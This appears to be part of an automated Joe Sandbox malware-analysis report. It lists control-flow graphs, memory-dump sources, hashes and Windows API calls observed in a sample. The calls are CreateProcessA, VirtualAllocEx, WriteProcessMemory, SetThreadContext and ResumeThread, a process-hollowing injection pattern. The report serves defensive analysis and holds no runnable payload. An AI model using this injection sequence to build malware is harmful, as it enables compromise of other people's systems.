                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B5D5E6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID: g.D$g.D
                                                                • API String ID: 963392458-1449590682
                                                                • Opcode ID: 66fedea27b4e257ec78b722b4eb91d10d3663c710b3239b8a0b569ee18ec1f36
                                                                • Instruction ID: 16378ba9ddc5c3415b896d96f6d40fc00b0414d5e013830245368ea4820fc30d
                                                                • Opcode Fuzzy Hash: 66fedea27b4e257ec78b722b4eb91d10d3663c710b3239b8a0b569ee18ec1f36
                                                                • Instruction Fuzzy Hash: D2914EB1E0065ADFEB10DFA8C8807DDBBB2FF44314F1482A9D849A7250DB749985CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 375 7b5d3b0-7b5d445 377 7b5d447-7b5d451 375->377 378 7b5d47e-7b5d49e 375->378 377->378 379 7b5d453-7b5d455 377->379 383 7b5d4d7-7b5d506 378->383 384 7b5d4a0-7b5d4aa 378->384 380 7b5d457-7b5d461 379->380 381 7b5d478-7b5d47b 379->381 385 7b5d465-7b5d474 380->385 386 7b5d463 380->386 381->378 394 7b5d53f-7b5d5f9 CreateProcessA 383->394 395 7b5d508-7b5d512 383->395 384->383 387 7b5d4ac-7b5d4ae 384->387 385->385 388 7b5d476 385->388 386->385 389 7b5d4d1-7b5d4d4 387->389 390 7b5d4b0-7b5d4ba 387->390 388->381 389->383 392 7b5d4bc 390->392 393 7b5d4be-7b5d4cd 390->393 392->393 393->393 396 7b5d4cf 393->396 406 7b5d602-7b5d688 394->406 407 7b5d5fb-7b5d601 394->407 395->394 397 7b5d514-7b5d516 395->397 396->389 399 7b5d539-7b5d53c 397->399 400 7b5d518-7b5d522 397->400 399->394 401 7b5d524 400->401 402 7b5d526-7b5d535 400->402 401->402 402->402 404 7b5d537 402->404 404->399 417 7b5d698-7b5d69c 406->417 418 7b5d68a-7b5d68e 406->418 407->406 420 7b5d6ac-7b5d6b0 417->420 421 7b5d69e-7b5d6a2 417->421 418->417 419 7b5d690 418->419 419->417 423 7b5d6c0-7b5d6c4 420->423 424 7b5d6b2-7b5d6b6 420->424 421->420 422 7b5d6a4 421->422 422->420 426 7b5d6d6-7b5d6dd 423->426 427 7b5d6c6-7b5d6cc 423->427 424->423 425 7b5d6b8 424->425 425->423 428 7b5d6f4 426->428 429 7b5d6df-7b5d6ee 426->429 427->426 431 7b5d6f5 428->431 429->428 431->431
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B5D5E6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID: g.D$g.D
                                                                • API String ID: 963392458-1449590682
                                                                • Opcode ID: db96efe01dfb6907b77f5e0c624cc09f8caef5bcad8124924594734139d42bb6
                                                                • Instruction ID: 2c2e1bab61b7e46b4142c7b6ce1c1368e33bd3d5d0909d8b10953e1ed24dad00
                                                                • Opcode Fuzzy Hash: db96efe01dfb6907b77f5e0c624cc09f8caef5bcad8124924594734139d42bb6
                                                                • Instruction Fuzzy Hash: 9A914DB1E0065ADFEB10DFA8C8817DDBBB2FF44314F1482A9D849A7250DB749985CF92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 539 17db55f-17db57f 540 17db5ab-17db5af 539->540 541 17db581-17db58e call 17d8ac0 539->541 542 17db5b1-17db5bb 540->542 543 17db5c3-17db604 540->543 548 17db5a4 541->548 549 17db590 541->549 542->543 550 17db606-17db60e 543->550 551 17db611-17db61f 543->551 548->540 594 17db596 call 17db7f8 549->594 595 17db596 call 17db808 549->595 550->551 553 17db621-17db626 551->553 554 17db643-17db645 551->554 552 17db59c-17db59e 552->548 555 17db6e0-17db7a0 552->555 557 17db628-17db62f call 17daf54 553->557 558 17db631 553->558 556 17db648-17db64f 554->556 589 17db7a8-17db7d3 GetModuleHandleW 555->589 590 17db7a2-17db7a5 555->590 560 17db65c-17db663 556->560 561 17db651-17db659 556->561 559 17db633-17db641 557->559 558->559 559->556 563 17db665-17db66d 560->563 564 17db670-17db679 call 17daf64 560->564 561->560 563->564 570 17db67b-17db683 564->570 571 17db686-17db68b 564->571 570->571 572 17db68d-17db694 571->572 573 17db6a9-17db6b6 571->573 572->573 575 17db696-17db6a6 call 17daf74 call 17daf84 572->575 579 17db6d9-17db6df 573->579 580 17db6b8-17db6d6 573->580 575->573 580->579 591 17db7dc-17db7f0 589->591 592 17db7d5-17db7db 589->592 590->589 592->591 594->552 595->552
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 017DB7C6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID: g.D
                                                                • API String ID: 4139908857-477188214
                                                                • Opcode ID: 0397f648a2d30bfae4eea07f74c4c1eb66193472fa428cda465392eb2cdda90c
                                                                • Instruction ID: 2d922b3ba7e70380fa1ad05c1ce9f8805f4601702a309098f5bf01e8e48478ff
                                                                • Opcode Fuzzy Hash: 0397f648a2d30bfae4eea07f74c4c1eb66193472fa428cda465392eb2cdda90c
                                                                • Instruction Fuzzy Hash: BF812370A00B098FDB24DF69D14475AFBF1BF89300F148A6ED08ADBA50D734E949CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 596 17d590c-17d59d9 CreateActCtxA 598 17d59db-17d59e1 596->598 599 17d59e2-17d5a3c 596->599 598->599 606 17d5a3e-17d5a41 599->606 607 17d5a4b-17d5a4f 599->607 606->607 608 17d5a51-17d5a5d 607->608 609 17d5a60 607->609 608->609 611 17d5a61 609->611 611->611
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 017D59C9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID: g.D
                                                                • API String ID: 2289755597-477188214
                                                                • Opcode ID: 9b175b861ced9a8d005043d1565d87ec00168b55bdf9d50f1e6f82b42ecea4ee
                                                                • Instruction ID: 6a9304eded8523800e4e2f965030fa8cfcea4a63d68dfaf9a3912f4b42c7b8c6
                                                                • Opcode Fuzzy Hash: 9b175b861ced9a8d005043d1565d87ec00168b55bdf9d50f1e6f82b42ecea4ee
                                                                • Instruction Fuzzy Hash: 0841E1B1C0061DCFDB24CFA9C884BDDBBB5BF89304F2481AAD408AB255DB756985CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 612 17d44e4-17d59d9 CreateActCtxA 615 17d59db-17d59e1 612->615 616 17d59e2-17d5a3c 612->616 615->616 623 17d5a3e-17d5a41 616->623 624 17d5a4b-17d5a4f 616->624 623->624 625 17d5a51-17d5a5d 624->625 626 17d5a60 624->626 625->626 628 17d5a61 626->628 628->628
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 017D59C9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID: g.D
                                                                • API String ID: 2289755597-477188214
                                                                • Opcode ID: aa12d80de7320e86bae0d474102be16496d42481c0401ad04c89c9d8cfb8ee03
                                                                • Instruction ID: 3f389a830b3427feead514f03d6378c39e9c268c55a5676018ce1c8361520529
                                                                • Opcode Fuzzy Hash: aa12d80de7320e86bae0d474102be16496d42481c0401ad04c89c9d8cfb8ee03
                                                                • Instruction Fuzzy Hash: C941B0B0C0072DCBDB24DFA9C884B9DBBB5BF49304F2480AAD409AB255DB755985CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 629 7b5b902-7b5b949 630 7b5b997-7b5f782 PostMessageW 629->630 631 7b5b94b-7b5b969 629->631 633 7b5f784-7b5f78a 630->633 634 7b5f78b-7b5f79f 630->634 631->630 633->634
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B5F775
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID: g.D
                                                                • API String ID: 410705778-477188214
                                                                • Opcode ID: 6d410c0e96dcdf6e877101b75f67d3e3372df09a8239554dff87c9dc72f06c44
                                                                • Instruction ID: d4040b4ae1d38e51c35828782ca10eeeb8f58d7e08ed424127cb9655246bcaf2
                                                                • Opcode Fuzzy Hash: 6d410c0e96dcdf6e877101b75f67d3e3372df09a8239554dff87c9dc72f06c44
                                                                • Instruction Fuzzy Hash: 4031EFF2D083848FDB05CF94C855BEEBFB4EF0A300F05408AD186A7292C639A545CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 636 7b5d120-7b5d176 638 7b5d186-7b5d1c5 WriteProcessMemory 636->638 639 7b5d178-7b5d184 636->639 641 7b5d1c7-7b5d1cd 638->641 642 7b5d1ce-7b5d1fe 638->642 639->638 641->642
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B5D1B8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID: g.D
                                                                • API String ID: 3559483778-477188214
                                                                • Opcode ID: 152022cc9959779acd84c1f07ceb71a54c755cff8dfb08c09cc614bcb97ec3dc
                                                                • Instruction ID: 6241e0ab91b954c01594394d8a5910a2bdf7ac454db77015382dfe22b44080ef
                                                                • Opcode Fuzzy Hash: 152022cc9959779acd84c1f07ceb71a54c755cff8dfb08c09cc614bcb97ec3dc
                                                                • Instruction Fuzzy Hash: 542157B1A002599FDB10CFA9C980BEEBBF1FF48314F10842AE959A7250C7789954CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 646 7b5d128-7b5d176 648 7b5d186-7b5d1c5 WriteProcessMemory 646->648 649 7b5d178-7b5d184 646->649 651 7b5d1c7-7b5d1cd 648->651 652 7b5d1ce-7b5d1fe 648->652 649->648 651->652
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B5D1B8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID: g.D
                                                                • API String ID: 3559483778-477188214
                                                                • Opcode ID: 6f2026beb97230b43789ebe3f8f08a7d90afca8758683e0574ad35539b9792be
                                                                • Instruction ID: e08c951f06993a20a4ec388afe95985783421455090b229fd0b7fa46bf5be511
                                                                • Opcode Fuzzy Hash: 6f2026beb97230b43789ebe3f8f08a7d90afca8758683e0574ad35539b9792be
                                                                • Instruction Fuzzy Hash: C52136B19003599FDB10CFAAC885BEEBBF5FF48314F10842AE959A7250C7789944CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 656 7b5cf88-7b5cfdb 658 7b5cfdd-7b5cfe9 656->658 659 7b5cfeb-7b5d01b Wow64SetThreadContext 656->659 658->659 661 7b5d024-7b5d054 659->661 662 7b5d01d-7b5d023 659->662 662->661
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B5D00E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID: g.D
                                                                • API String ID: 983334009-477188214
                                                                • Opcode ID: 0bfc9aa691f2c4114cf0ef2055d724f82cf614e5825ef33b4f796c85a1505142
                                                                • Instruction ID: 7e0b7c206b982c9c58e2f99552bee73f78a13d375d5132759645c8c2a968e2d9
                                                                • Opcode Fuzzy Hash: 0bfc9aa691f2c4114cf0ef2055d724f82cf614e5825ef33b4f796c85a1505142
                                                                • Instruction Fuzzy Hash: 072138B69003098FDB10DFAAC4857EEBFF4EF48324F14842AD859A7241C7789985CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 666 7b5d211-7b5d2a5 ReadProcessMemory 669 7b5d2a7-7b5d2ad 666->669 670 7b5d2ae-7b5d2de 666->670 669->670
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B5D298
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID: g.D
                                                                • API String ID: 1726664587-477188214
                                                                • Opcode ID: 269955d9c7ea6da3731d6b54925bf80494bdcb349aede1e9b48b87ba146483e4
                                                                • Instruction ID: 5d32c871273a92cdb5db2b3e37ad471946d131de9392d9777d937e812dff00b5
                                                                • Opcode Fuzzy Hash: 269955d9c7ea6da3731d6b54925bf80494bdcb349aede1e9b48b87ba146483e4
                                                                • Instruction Fuzzy Hash: 5C2148B19002599FDB10DFA9C980BEEBBF1FF48310F10842EE959A7250C7389545CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B5D298
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID: g.D
                                                                • API String ID: 1726664587-477188214
                                                                • Opcode ID: dc3c0b54c1cec9037d1e49ebf2bf941924f7e6250c854f69b5c693e9b7553af9
                                                                • Instruction ID: f171d3c8dc253448bddc27acf2327543ae45a0adbb5b80f1221b76f844ecd1c7
                                                                • Opcode Fuzzy Hash: dc3c0b54c1cec9037d1e49ebf2bf941924f7e6250c854f69b5c693e9b7553af9
                                                                • Instruction Fuzzy Hash: 0F2148B19003599FDB10DFAAC880BEEFBF5FF48310F108429E918A7250C7349544CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B5D00E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID: g.D
                                                                • API String ID: 983334009-477188214
                                                                • Opcode ID: bd37430bb47fd578ed101861a47efc2d4f8d784984b7172cc46bd82d451c95c9
                                                                • Instruction ID: 39ebe217fa27caa3c5b83bfb6825ac19344abafeb0beaa65ef03f612cd5da321
                                                                • Opcode Fuzzy Hash: bd37430bb47fd578ed101861a47efc2d4f8d784984b7172cc46bd82d451c95c9
                                                                • Instruction Fuzzy Hash: C52129B19003098FDB10DFAAC485BEEBBF4EF48324F148429D559A7240C7789985CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DDAC7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID: g.D
                                                                • API String ID: 3793708945-477188214
                                                                • Opcode ID: cdf6cc4d8987bc199e137121ea43352009239c275a88b4eab5148611a5f52114
                                                                • Instruction ID: 5e23a58c4aab48d23d54fc55cb37891170c4f7dd738261b841d94698e49b6d76
                                                                • Opcode Fuzzy Hash: cdf6cc4d8987bc199e137121ea43352009239c275a88b4eab5148611a5f52114
                                                                • Instruction Fuzzy Hash: 3A21E4B59002489FDB10CF9AD984ADEFFF4EB48320F14841AE914A7350D374A944CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B5D0D6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID: g.D
                                                                • API String ID: 4275171209-477188214
                                                                • Opcode ID: 67ec9d5829e28ea3046455eff1d91fb5bc6331a76e9f225cbf7e9b7522f2e010
                                                                • Instruction ID: 1275d4b1bcaab4486507db6c615962074c8bf7940df7434a0b443226b3a7492f
                                                                • Opcode Fuzzy Hash: 67ec9d5829e28ea3046455eff1d91fb5bc6331a76e9f225cbf7e9b7522f2e010
                                                                • Instruction Fuzzy Hash: BD1156B29002498FDB20DFA9C844BEEBFF5EB88324F24841AE459A7250C7359544CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017DB841,00000800,00000000,00000000), ref: 017DBA52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID: g.D
                                                                • API String ID: 1029625771-477188214
                                                                • Opcode ID: 8f68573fabef359e0465dd59e22177b561090b6095aaa65613c64d527436c60f
                                                                • Instruction ID: b7225f3fcbc28f784dde8204d0928cedea27925fd707f683dd598096972d955b
                                                                • Opcode Fuzzy Hash: 8f68573fabef359e0465dd59e22177b561090b6095aaa65613c64d527436c60f
                                                                • Instruction Fuzzy Hash: 181112B69043498FDB20CF9AC484ADEFBF4EB89310F11846EE519A7210C375AA45CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B5D0D6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID: g.D
                                                                • API String ID: 4275171209-477188214
                                                                • Opcode ID: d51533d8d1992cea0813406eee04740be27755e9bb03d16d07bc4b684f8938da
                                                                • Instruction ID: 7e193f0755ee8bf4e56f827394de0a458fb15b697cbd7d467d68cdb09eff2f40
                                                                • Opcode Fuzzy Hash: d51533d8d1992cea0813406eee04740be27755e9bb03d16d07bc4b684f8938da
                                                                • Instruction Fuzzy Hash: F91167B29002499FDB10DFAAC844BEEFFF5EF88324F248419E519A7250C735A544CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,017DB841,00000800,00000000,00000000), ref: 017DBA52
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID: g.D
                                                                • API String ID: 1029625771-477188214
                                                                • Opcode ID: e3e38ab16e41473324f74c6ff4038d6b1b9a41c4294ee573db6b8d447c26fda1
                                                                • Instruction ID: 874981bd1f9c54b3d707fa3f17f9b4882d7a5043b0ff19f70676d4abf004d09b
                                                                • Opcode Fuzzy Hash: e3e38ab16e41473324f74c6ff4038d6b1b9a41c4294ee573db6b8d447c26fda1
                                                                • Instruction Fuzzy Hash: 4C11F0B6D002498FDB20CF9AC584BDEFBF4AF88314F15842AE519AB610C375A645CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID: g.D
                                                                • API String ID: 947044025-477188214
                                                                • Opcode ID: 2c0774ecde76638b93a5cb2aa4946d75471cf519e6a8800795a18fff7b441f21
                                                                • Instruction ID: 011e5e2264bf52ff7a37d1f4661fdfa59046d311eaf82669b63221ec2ea86317
                                                                • Opcode Fuzzy Hash: 2c0774ecde76638b93a5cb2aa4946d75471cf519e6a8800795a18fff7b441f21
                                                                • Instruction Fuzzy Hash: 7A1146B19002498FDB20DFA9C4447EEBFF5EB88324F20845AD459A7250C634A988CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID: g.D
                                                                • API String ID: 947044025-477188214
                                                                • Opcode ID: 417393b27289fa065aab01f66e30f9f344ccf995c8aee3a36c5b20ee2e1aa8f1
                                                                • Instruction ID: 5a9dd5ad4b0e8c2876c7241a9eb7ceb4121af8b44b4e82548b329e77b1514908
                                                                • Opcode Fuzzy Hash: 417393b27289fa065aab01f66e30f9f344ccf995c8aee3a36c5b20ee2e1aa8f1
                                                                • Instruction Fuzzy Hash: BF1166B19003498FDB20DFAAC4447EEFFF5EB88324F208469D519A7240CB34A948CFA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 017DB7C6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID: g.D
                                                                • API String ID: 4139908857-477188214
                                                                • Opcode ID: d058271c61b1a6a3509dea47c6d1dced5d27f2b1d50fe7df06a1252691dd11ac
                                                                • Instruction ID: 7c074dcc104afd3bfdc0032cf9d085f8592faf8f6dc906efb3ae75207942f4bf
                                                                • Opcode Fuzzy Hash: d058271c61b1a6a3509dea47c6d1dced5d27f2b1d50fe7df06a1252691dd11ac
                                                                • Instruction Fuzzy Hash: B01110B5C002498FDB10CF9AC444ADEFBF8EF89324F15846AD419B7610C375A545CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B5F775
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID: g.D
                                                                • API String ID: 410705778-477188214
                                                                • Opcode ID: 7f339bb08aceb1531a0c253340e21cbad5e86af4885096e42e6969b1d9580310
                                                                • Instruction ID: d0f70014e35ee1e7acd2bcb4b921f135eaddeddfc43e19f161a67a544daa7aef
                                                                • Opcode Fuzzy Hash: 7f339bb08aceb1531a0c253340e21cbad5e86af4885096e42e6969b1d9580310
                                                                • Instruction Fuzzy Hash: DB1106B5800349DFDB10DF99C885BEEFBF8EB48314F108459E958A7210C375A944CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684736393.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_173d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 723f3917156e97bf6863fef109bbf6f5d63beb2cb085b9f7d13fc412515d70e4
                                                                • Instruction ID: afd667c243851079e6d41404ffbca1caacc0ea3972904d5b31ae2cbccd7afdb1
                                                                • Opcode Fuzzy Hash: 723f3917156e97bf6863fef109bbf6f5d63beb2cb085b9f7d13fc412515d70e4
                                                                • Instruction Fuzzy Hash: AD2100B1100204DFDB21DF98D980B66FF65FBC8324F60C1A9ED090A257C336E456CAA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684796955.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_174d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b9f96eb9e7617f8a8397857283d8c879c280f9722ec4470f218b5d5a31e3a75f
                                                                • Instruction ID: f0ea6e7d381e20cf83cfbd8003e4b0fe9d7abcf44efa2b3a77c1026c64d7a7c2
                                                                • Opcode Fuzzy Hash: b9f96eb9e7617f8a8397857283d8c879c280f9722ec4470f218b5d5a31e3a75f
                                                                • Instruction Fuzzy Hash: 9B212971608200DFDB15DF98D5C4B26FBA5FB94324F20C6ADE9894B356C336D446CA61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684796955.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_174d000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4b0db5519dd578bf57e4afa1ef590e5ff1f576aa476261fa107f3bb74507fa7
